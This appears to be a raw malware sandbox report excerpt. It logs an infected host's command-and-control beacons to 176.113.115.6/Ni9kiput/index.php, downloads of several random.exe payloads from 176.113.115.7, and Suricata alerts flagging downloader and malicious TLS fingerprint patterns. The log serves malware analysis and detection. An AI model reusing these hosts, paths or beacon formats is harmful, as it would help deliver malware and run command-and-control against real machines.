Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /files/bonus_max/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:00:50 GMTIf-None-Match: "310600-62f4930517c6a"
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060380101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:02:28 GMTIf-None-Match: "1cf600-62f49362c1f1e"
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060390101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:23:00 GMTIf-None-Match: "47d600-62f497fa124d0"
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 34 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060400101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:20:21 GMTIf-None-Match: "3c3a00-62f497622938c"
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 34 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060410101&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5

Source: Joe Sandbox View

IP Address: 176.113.115.7 176.113.115.7

Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49720 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49750 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49766 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49761 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49801 -> 23.67.133.187:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49812 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49817 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49824 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49830 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49842 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49856 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49852 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49871 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49859 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49883 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49877 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49899 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49912 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49923 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49932 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49942 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49949 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49957 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49998 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49999 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50026 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50024 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50027 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50028 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50031 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50034 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50029 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50035 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50036 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50039 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50037 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50040 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50041 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50042 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50052 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50048 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50055 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50057 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50066 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50068 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50070 -> 176.113.115.7:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50122 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50125 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50133 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50130 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50186 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50189 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50188 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50192 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50221 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50121 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50223 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50224 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50225 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50132 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50252 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50247 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50257 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50258 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50245 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50128 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50227 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50250 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50191 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50249 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50243 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50246 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50254 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50124 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50228 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50242 -> 188.114.97.3:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.6
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.7
